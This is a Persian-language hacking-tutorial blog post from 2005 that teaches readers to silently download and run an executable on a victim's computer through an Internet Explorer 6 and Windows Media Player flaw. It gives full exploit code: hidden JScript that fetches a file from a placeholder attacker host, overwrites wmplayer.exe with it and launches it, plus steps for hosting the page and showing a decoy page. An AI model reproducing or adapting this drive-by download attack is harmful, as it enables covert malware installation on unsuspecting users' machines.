تبلیغات
آموزش هک - فرستادن و اجرای یك فایل از طریق سایت بصورت مخفی در كامپیوتر هدف!

به نام خدا

آموزش هک
امروز   به وبلاگ  آموزش هک  خوش آمدید


¿فرستادن و اجرای یك فایل از طریق سایت بصورت مخفی در كامپیوتر هدف!
دوشنبه 18 مهر 1384

سلام دیر اومدم اما با دست پر اینو داشته باشین:

 

 

فرستادن و اجرای یك فایل از طریق سایت بصورت مخفی در كامپیوتر هدف!

با روشی كه توضیخ خواهم داد شما می توانید از طریق یك سایت فایلی را در كامپیوتر هدف خود دانلود و سپس اجرا كنید! راه نفوذ این روش از طریق سر ریز شدن اینترنت اكسپلورر 6 و مدیا پلیر هست.



1.
یك فایل با پسوند HTML تشكیل دهید و كد زیر را در آن قرار دهید:

CODE

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://YourHost.com/YourEvilFile.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script>



بجای قسمت http://YourHost.com/YourEvilFile.exe آدرس فایلی را بنویسید كه می خواهید در كامپیوتر هدف اجرا شود.

اگر هدف شما مدیا پلیر را در شاخه یا داریوی غیر از C:\\Program Files\\Windows Media Player\\wmplayer.exe نصب كرده است این قسمت را نیز تغییر دهید.



2. یك فایل دیگر با نام error.jsp تشكیل دهید و داخل آن هر كد html كه می خواهید قرار دهید. چون هدف شما در هنگام دانلود و اجرا شدن فایل صفحه درون فایل error.jsp را می بیند.


3. حالا فایل html و error.jsp را در یك شاخه روی یك فضا رایگانی كه از یك سرور مثل
http://www.angelfire.com گرفته اید آپ لود كنید.


4. از فایل اجرایی مدیا پلیر خود wmplayer.exe یك كپی تهیه كنید چون احتمال دارد خراب شود


5. وارد صفحه html كه ساخته بودید از طریق اینترنت اكسپلورر شوید. مثلا http://www.angelfire.com/youaccoundname/index.html


6. فایل بدون هیچ اخطاری دانلود شده و بجای فایل اجرایی مدیا پلیر میشیند و سپس اجرا می شود

نوشته شده در دوشنبه 18 مهر 1384 و ساعت 10:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -